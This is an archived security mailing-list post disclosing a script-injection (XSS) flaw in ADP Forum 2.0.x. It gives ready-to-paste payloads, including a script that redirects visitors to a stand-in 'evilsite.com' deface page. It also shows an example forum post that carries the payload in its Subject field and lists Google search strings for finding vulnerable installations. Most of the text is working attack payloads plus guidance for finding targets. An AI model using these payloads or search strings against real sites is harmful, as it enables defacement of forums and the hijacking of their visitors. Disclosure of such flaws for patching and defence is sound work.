<<< Date Index >>>     <<< Thread Index >>>

ADP Forum 2.0,* script &#304;njection



ADP Forum 2.0,* script &#304;njection
----------------------------------------------------
site:http://www.linux.it/~fedro/
demo:http://www.adp.host.sk/Forum203/ 
--------------------------------------------------
Post This Code:

<script>alert(/Liz0ziM/)</script>

<script>location.href="http://evilsite.com/deface.html";;</script>

vs..
---------------------------------------------------------
Example Post Message :


Name :Liz0ziM 
Username :username 
Password :password
E-mail :liz0@xxxxxxxxxxx
Subject :<script>location.href="http://evilsite.com/deface.html";;</script> 
Message :LOL :=)

---------------------------------------------------------

Credit:Liz0ziM
Mail :liz0@xxxxxxxxxxx
Site :www.biyosecurity.com
BiyoSecurityTeam: Liz0ziM,Codexploder'tq,r00t3rr0r,y3LL0w
------------------------------------------------------------
google:

"ADP Forum 2.0.3 is powered by VzScripts"
"ADP Forum 2.0.2"
"ADP Forum 2.0.1"
"ADP Forum 2.0"

------------------------------------------------------------

Source:

http://www.blogcu.com/Liz0ziM/338614/

http://biyosecurity.be/bugs/adpforum2.html

http://biyosecurity.be/bugs/adpforum2.txt